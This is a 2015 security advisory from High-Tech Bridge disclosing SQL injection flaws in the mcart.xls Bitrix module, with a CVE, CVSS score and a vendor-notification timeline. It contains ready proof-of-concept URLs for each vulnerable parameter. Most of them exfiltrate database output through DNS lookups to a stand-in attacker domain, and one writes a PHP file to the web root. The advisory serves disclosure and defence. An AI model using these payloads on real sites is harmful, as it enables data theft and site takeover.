Stay in Touch

Application security insights and invitations to exclusive events in your inbox


Your data will stay confidential Private and Confidential

Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module

Advisory ID:HTB23279
Product:mcart.xls Bitrix module
Vendor:www.mcart.ru
Vulnerable Versions:6.5.2 and probably prior
Tested Version:6.5.2
Advisory Publication:November 18, 2015 [without technical details]
Vendor Notification:November 18, 2015
Public Disclosure:January 13, 2016
Vulnerability Type:SQL Injection [CWE-89]
CVE Reference:CVE-2015-8356
Risk Level:Medium
CVSSv3 Base Score:6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
CVSSv3 Calculator
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website.

All discovered vulnerabilities require that the attacker is authorized against the website and has access to vulnerable module. However the vulnerabilities can be also exploited via CSRF vector, since the web application does not check origin of received requests. This means, that a remote anonymous attacker can create a page with CSRF exploit, trick victim to visit this page and execute arbitrary SQL queries in database of vulnerable website.

1. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/bitrix/admin/mcart_xls_import.php?del_prof_real=1&xls_profile= %27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version( )),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(10 1),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))+--+

2. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

A simple exploit below will write "<?phpinfo()?>" string into "/var/www/file.php" file:

http://[host]/bitrix/admin/mcart_xls_import.php?xls_profile=%27%20UNION%20SE LECT%201,%27%3C?%20phpinfo%28%29;%20?%3E%27,3,4,5,6,7,8,9,0%20INTO%20OUTFILE %20%27/var/www/file.php%27%20--%202

Successful exploitation requires that the file "/var/www/file.php" is writable by MySQL system account.

3. Input passed via the "xls_iblock_id", "xls_iblock_section_id", "firstRow", "titleRow", "firstColumn", "highestColumn", "sku_iblock_id" and "xls_iblock_section_id_new" HTTP GET parameters to "/bitrix/admin/mcart_xls_import_step_2.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

Below is a list of exploits for each vulnerable parameter. The exploits are based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

"xls_iblock_id":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(CONCAT(CH AR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),C HAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),C HAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)) ))%29+--+&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&first Column=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ iblock_section_id_new=0
"xls_iblock_section_id"
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0,0,(select%20load_file (CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),C HAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),C HAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97), CHAR(114))))%29+--+&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highe stColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section _id_new=0

"firstRow":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0,0,0,0,0,0,0,0,0(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20v ersion()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107), CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102) ,CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&titleRow=0&firstC olumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_i block_section_id_new=0

"titleRow":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(se lect%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CH AR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),C HAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&firstColu mn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblo ck_section_id_new=0

"firstColumn":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0%27,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(9 2),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR( 97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR( 109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%2 9+--+&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ibl ock_section_id_new=0

"highestColumn":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0%27,0,0,0,0,(select%20load_file (CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),C HAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),C HAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97), CHAR(114))))%29+--+&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ibloc k_section_id_new=0

"sku_iblock_id":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1, 0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR (46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR (114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHA R(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&cml2_link_code=1&xls_iblock_sec tion_id_new=0

"xls_iblock_section_id_new":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1& cml2_link_code=1&xls_iblock_section_id_new=0,(select%20load_file(CONCAT(CHAR (92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHA R(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHA R(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) %29+--+


ImmuniWeb® On-Demand Web Application Penetration Test


Solution:
Disclosure timeline:
2015-11-18 Vendor notified via email, no reply.
2015-12-01 Vendor notified via email, no reply.
2015-12-04 Vendor notified via contact form and email, no reply.
2015-12-11 Fix Requested via contact form and emails, no reply.
2015-12-28 Fix Requested via contact form and emails, no reply.
2016-01-11 Fix Requested via contact form and emails, no reply.
2016-01-13 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.


References:
[1] High-Tech Bridge Advisory HTB23279 - https://www.htbridge.com/advisory/HTB23279 - Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module
[2] mcart.xls - https://marketplace.1c-bitrix.ru/solutions/mcart.xls/ - A Bitrix module for upload and import data from Excel file.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[6] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.
User Comments
Add Comment


Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
High-Tech Bridge on Facebook High-Tech Bridge on Twitter High-Tech Bridge on LinkedIn High-Tech Bridge RSS Feeds Send by Email
Share
Let's Talk